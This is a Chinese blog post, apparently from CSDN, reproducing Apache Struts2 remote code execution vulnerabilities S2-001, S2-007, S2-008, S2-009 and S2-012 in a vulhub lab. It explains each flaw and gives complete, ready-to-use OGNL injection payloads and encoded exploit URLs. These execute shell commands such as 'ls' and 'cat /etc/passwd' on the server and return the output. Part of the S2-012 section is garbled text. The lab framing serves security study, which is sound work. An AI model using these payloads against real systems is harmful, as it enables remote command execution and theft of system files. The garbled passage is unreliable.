vulhub系列之struts2(s2-001、s2-007、s2-008、s2-009、s2-012)

最新推荐文章于 2024-08-07 18:47:37 发布
最新推荐文章于 2024-08-07 18:47:37 发布
阅读量1.4k 收藏 4
点赞数
文章标签: struts2 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_43071873/article/details/110194566
版权
本文详细介绍了Struts2中的多个远程代码执行漏洞,包括S2-001、S2-007、S2-008、S2-009、S2-012等,解释了每个漏洞的原理、影响版本及复现步骤。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

S2-001 远程代码执行漏洞

漏洞详情:
该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行
影响版本:
Struts 2.0.0 - Struts 2.0.8
漏洞复现:
测试漏洞,%{1+1}
在这里插入图片描述

提交后报错返回解析为2,确认漏洞存在。

在这里插入图片描述

获取tomcat执行路径:
在这里插入图片描述

%{"tomcatBinDir{"+@java.lang.System@getProperty("user.dir")+"}"}

在这里插入图片描述
Tomcat的执行路径:tomcatBinDir{/usr/local/tomcat}
获取Web路径:

%{
#req=@org.apache.struts2.ServletActionContext@getRequest(),
#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),
#response.println(#req.getRealPath('/')),
#response.flush(),
#response.close()
}

在这里插入图片描述

/usr/local/tomcat/webapps/ROOT/

执行命令

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"ls"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
}

将命令进行url编码
在这里插入图片描述

漏洞利用成功
手工测的话看对应靶场博客就到此为止了,而使用工具扫描一下呢?
在这里插入图片描述

嚯,好家伙,001、005、007、009、012、015、016、那就排好队,一个一个来。
先用现有的工具扫描一波
在这里插入图片描述

016直接能利用
在这里插入图片描述

上另外一个工具,只发现了005、016,009检测不出来
在这里插入图片描述

虽然工具扫出来存在那么多漏洞,但是像007没有利用模块。所以还是老老实实在vulhub上搭建靶场吧。

S2-007远程代码执行漏洞

漏洞简述:
age来自于用户输入,传递一个非整数给id导致错误,struts会将用户的输入当作ongl表达式执行,从而导致了漏洞。
影响版本: 2.0.0 - 2.2.3
漏洞复现:
在这里插入图片描述

将payloda输入age框,通过bp抓包,看回显包,可以看到成功执行ls

' + (#_memberAccess["allowStaticMethodAccess"]=true,#foo=new java.lang.Boolean("false") ,#context["xwork.MethodAccessor.denyMethodExecution"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ls /').getInputStream())) + '

在这里插入图片描述

S2-008

漏洞原理:

  1. Cookie 拦截器错误配置可造成 OGNL 表达式执行由于大多 Web 容器(如 Tomcat)对 Cookie 名称都有字符限制,一些关键字符无法使用
  2. struts2 应用开启 devMode 模式后会有多个调试接口能够直接查看对象信息或直接执行命令,但这种情况在生产环境中几乎不可能存在。
    影响版本:
    Struts 2.1.0 - Struts 2.3.1
    漏洞复现:
    直接利用hackbar,通过在url后添加payload
http://192.168.118.147:8080/devmode.action?debug=command&expression=%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass%28%29.getDeclaredField%28%22allowStaticMethodAccess%22%29%2c%23f.setAccessible%28true%29%2c%23f.set%28%23_memberAccess%2ctrue%29%2c%23a%3d@java.lang.Runtime@getRuntime%28%29.exec%28%22ls%22%29.getInputStream%28%29%2c%23b%3dnew%20java.io.InputStreamReader%28%23a%29%2c%23c%3dnew%20java.io.BufferedReader%28%23b%29%2c%23d%3dnew%20char%5b50000%5d%2c%23c.read%28%23d%29%2c%23genxor%3d%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29.getWriter%28%29%2c%23genxor.println%28%23d%29%2c%23genxor.flush%28%29%2c%23genxor.close%28%29

在这里插入图片描述

S2-009

漏洞描述
OGNL提供了广泛的表达式评估功能等功能。该漏洞允许恶意用户绕过ParametersInterceptor内置的所有保护(正则表达式,拒绝方法调用),从而能够将任何暴露的字符串变量中的恶意表达式注入进行进一步评估。
在S2-003和S2-005中已经解决了类似的行为,但事实证明,基于列入可接受的参数名称的结果修复仅部分地关闭了该漏洞。
ParametersInterceptor中的正则表达式将top [‘foo’](0)作为有效的表达式匹配,OGNL将其作为(top [‘foo’])(0)处理,并将“foo”操作参数的值作为OGNL表达式求值。这使得恶意用户将任意的OGNL语句放入由操作公开的任何String变量中,并将其评估为OGNL表达式,并且由于OGNL语句在HTTP参数中,攻击者可以使用黑名单字符(例如#)禁用方法执行并执行任意方法,绕过ParametersInterceptor和OGNL库保护
影响版本
2.1.0 - 2.3.1.1

Payload:

`http://192.168.118.147:8080/ajax/example5.action?age=12313&name=(%23context[%22xwork.MethodAccessor.denyMethodExecution%22]=+new+java.lang.Boolean(false),+%23_memberAccess[%22allowStaticMethodAccess%22]=true,+%23a=@java.lang.Runtime@getRuntime().exec(%27ls%27).getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[51020],%23c.read(%23d),%23kxlzx=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23kxlzx.println(%23d),%23kxlzx.close())(meh)&z[(name)(%27meh%27)]`

下载打开。

在这里插入图片描述

S2-012

漏洞原理:
如果在配置 Action 中 Result 时使用了重定向类型,并且还使用 p a r a m n a m e 作 为 重 定 向 变 量 , 例 如 : < p a c k a g e n a m e = " S 2 − 012 " e x t e n d s = " s t r u t s − d e f a u l t " > < a c t i o n n a m e = " u s e r " c l a s s = " c o m . d e m o . a c t i o n . U s e r A c t i o n " > < r e s u l t n a m e = " r e d i r e c t " t y p e = " r e d i r e c t " > / i n d e x . j s p ? n a m e = {param_name} 作为重定向变量,例如: <package name="S2-012" extends="struts-default"> <action name="user" class="com.demo.action.UserAction"> <result name="redirect" type="redirect">/index.jsp?name= paramname<packagename="S2012"extends="strutsdefault"><actionname="user"class="com.demo.action.UserAction"><resultname="redirect"type="redirect">/index.jsp?name={name}
/index.jsp
/index.jsp


这里 UserAction 中定义有一个 name 变量,当触发 redirect 类型返回时,Struts2 获取使用 ${name} 获取其值,在这个过程中会对 name 参数的值执行 OGNL 表达式解析,从而可以插入任意 OGNL 表达式导致命令执行。

影响版本
2.1.0 - 2.3.13

漏洞复现:
Payload:(传入s2-001的payload即可)

%{
#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"cat","/etc/passwd"})).redirectErrorStream(true).start(),
#b=#a.getInputStream(),
#c=new java.io.InputStreamReader(#b),
#d=new java.io.BufferedReader(#c),
#e=new char[50000],
#d.read(#e),
#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),
#f.getWriter().println(new java.lang.String(#e)),
#f.getWriter().flush(),#f.getWriter().close()
}

在这里插入图片描述

S2-013

上工具直接利用。

在这里插入图片描述
在这里插入图片描述

后边还有
在这里插入图片描述

这么些个漏洞,就先暂留,复现这么多同系列的 有点疲了。

Lin冲啊
关注
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391)
qq_51577576的博客
10-15 1452
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-008 (CVE-2012-0391) S2-008 涉及多个漏洞,主要利用对传入参数没有严格限制,导致多个地方可以执行恶意代码。 第一种情况其实就是 S2-007,在异常处理时的OGNL 执行第二种的cookie的方式,虽然在struts2没有对恶意代码进行限制,但是java的webserver(Tomcat),对cookie 的名称有较多限制,在传入struts2之前就被处理,从而较为鸡肋第三种需要开启devModedebug 模式。
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-007(CVE-2012-0838)
qq_51577576的博客
10-13 1575
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞S2-007(CVE-2012-0838) S2-007和S2-003、S2-005的漏洞源头都是一样的,都是struts2对OGNL的解析过程中存在漏洞 当用户提交 age 为字符串而非整形数值时,后端用代码拼接 "'" + value + "'" 然后对其进行 OGNL 表达式解析。要成功利用,只需要找到一个配置了类似验证规则的表单字段使之转换出错,借助类似 SQLi 注入单引号拼接的方式即可注入任意 OGNL 表达式
vulhub-struts2
bqnagus
10-03 2080
vulhub-struts2 复现
vulhub靶场之struts2】——s2-057
最新发布
weixin_57240513的博客
08-07 648
漏洞产生于网站配置XML时如果没有设置namespace的值,并且上层动作配置中并没有设置或使用通配符namespace时,可能会导致远程代码执行漏洞的发生。同样也可能因为url标签没有设置value和action的值,并且上层动作并没有设置或使用通配符namespace,从而导致远程代码执行漏洞的发生。
struts2/s2-061(vulhub复现)
qq_40646572的博客
10-31 1096
Apache Struts2框架是一个用于开发Java EE网络应用程序的Web框架。Apache Struts2020年12月08日披露 S2-061 Struts 远程代码执行漏洞(CVE-2020-17530),在使用某些tag等情况下可能存在OGNL表达式注入漏洞,从而造成远程代码执行,风险极大。S2-061是对S2-059沙盒进行的绕过。
[ vulhub漏洞复现篇 ] Struts2 远程命令执行漏洞(S2-001
qq_51577576的博客
08-21 1295
Struts2 远程命令执行漏洞(S2-001) 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的数据,由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析,所以可以直接构造 Payload 进行命令执行。
[ vulhub漏洞复现篇 ] Struts2远程代码执行漏洞S2-009 (CVE-2011-3923)
qq_51577576的博客
10-16 973
[ vulhub漏洞复现篇 ] Struts2远程代码执行漏洞S2-009 (CVE-2011-3923) Struts2框架中ParametersInterceptor拦截器只检查传入的参数名是否合法,不会检查参数值.例如传入参数top[‘foo’](0)会通过ParametersInterceptor的白名单检查,OGNL会将其解析为(top[‘foo’])(0),并将foo的值也作为OGNL表达式进行计算从而造成代码执行.
struts2反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017
08-28
然而,这个框架的历史上存在一系列安全漏洞,其中特别值得关注的是与反序列化相关的漏洞,如s2-005、s2-016、s2-016_3和s2-017。这些漏洞允许攻击者通过精心构造的输入,利用Struts2的内置机制执行任意代码,从而...
struts2漏洞s2-045,不升级jar版本的修补方法,已验证.docx
07-04
Struts2 漏洞 S2-045 修补方法 Struts2 是一个基于 Java 的 Web 应用程序框架,广泛应用于企业级应用程序中。然而,Struts2 中存在着一些漏洞,例如 S2-045 漏洞,该漏洞可能会导致严重的安全问题。今天,我们将...
vulhub复现之struts漏洞复现
m0_70483044的博客
10-06 636
Struts2就是一个框架,它是属于web层的一个框架,是Struts1的一个升级版,但是它和Struts1来相比,提供了太多的增强和改进,怎么运行的呢,就是实现了Servlet的功能,来进行控制页面跳转。同时这也是基于MVC设计模式的Web应用框架,Struts2的控制功能就相当于MVC中的Controller的功能,用来控制页面的转向。​。
vulhub-struts2-S2-008 远程代码执行漏洞复现
qq_56426046的博客
06-19 568
影响版本: 2.1.0 - 2.3.1。
vulhubStruts2 S2-061 远程命令执行漏洞(CVE-2020-17530)
weixin_42884199的博客
12-07 479
前言 Apache Struts框架, 会对某些特定的标签的属性值,比如id属性进行二次解析,所以攻击者可以传递将在呈现标签属性时再次解析的OGNL表达式,造成OGNL表达式注入。从而可能造成远程执行代码。 一、启动靶机 docker-compose build docker-compose up -d 二、构造payload %25{(223*223)} view-source:http://192.168.150.146:8080/index.action?id=%25{(223*223)} 访
vulhub-struts2-S2-007 远程代码执行漏洞复现
qq_56426046的博客
06-19 357
影响版本: 2.0.0 - 2.2.3。
vulhub漏洞复现系列struts2(s2-048、s2-052、S2-053、s2-057、s2-059)
weixin_43071873的博客
12-11 1451
本来想把struts2剩下的靶场全部打完然后写博客分享给大家,但是vulhub搭建实在是太慢了!!!无奈只能先把复现好的这几个分享出来了。 ** (CVE-2017-9791)s2-048 ** 一、漏洞简介 当实用了Struts2 Struts1 插件时,可能导致不受信任的输入传入到ActionMessage类种导致命令执行 二、影响范围 2.3.x 三、漏洞复现: 进入靶场 第一个框填入${4*4},其余两个框随意填 可以看到计算结果回显出来了 Poc: %{(#dm=@ognl.OgnlCon
docker—vulhubstruts2漏洞复现详细过程(s2-001/007/008)
AmyBaby00的博客
11-14 3123
本文为学习笔记,仅限学习交流。 不得利用、从事危害国家或人民安全、荣誉和利益等活动。 请参阅《中华人民共和国网络安全法》 简介&准备: 1、centos7 已开启docker :systemctl restart docker.service 2、进入vulhubstruts2 : cd vulhub/struts2 3、启用测试环境:docker-compose up -d 4、PC...
Vulhub靶场之struts2漏洞复现
weixin_66717977的博客
03-21 1871
struts2漏洞中属s2系列杀伤力最大,本文基于vulhub靶场,将介绍并复现strut2漏洞
vulhub靶机struts2环境下的s2-032(CVE-2016-3081)(远程命令执行漏洞)
m0_73248913的博客
05-13 383
当用户提交表单数据并验证失败时,后端会将用户之前提交的参数值使用OGNL表达式%{value}进行解析,然后重新填充到对应的表单数据中。Struts 2.3.19至2.3.20.22.3.21至2.3.24.1和2.3.25至2.3.28。如果返回的页面出现异常,则可以认定为目标是基于 Struts2 构建的。2、 页面上输出了与业务有关错误消息,或者 1111 被回显到了页面上。1、 页面直接出现 404 或者 500 等错误。3、 页面的内容结构发生了明显的改变。4、 页面发生了重定向。
Vulhub下的Struts-2漏洞复现
热门推荐
weixin_44508748的博客
04-12 1万+
参考网址: https://github.com/phith0n/vulhub/tree/master/struts2/ Struts-S2-001 远程代码利用表单验证错误 1.漏洞描述 该漏洞因为用户提交表单数据并且验证失败时,后端会将用户之前提交的参数值使用 OGNL 表达式 %{value} 进行解析,然后重新填充到对应的表单数据中。例如注册或登录页面,提交失败后端一般会默认返回之前提交的...
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-048(CVE-2017-9791)
qq_51577576的博客
12-16 1485
[ vulhub漏洞复现篇 ] struts2远程代码执行漏洞s2-048(CVE-2017-9791) Apache Struts2 2.3.x 系列启用了struts2-struts1-plugin 插件并且存在 struts2-showcase 目录,其漏洞成因是当ActionMessage接收客户可控的参数数据时,用户可控的值添加到 ActionMessage 并在客户前端展示,导致其进入 getText 函数,最后 message 被当作 ognl 表达式执行,导致任意代码执行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值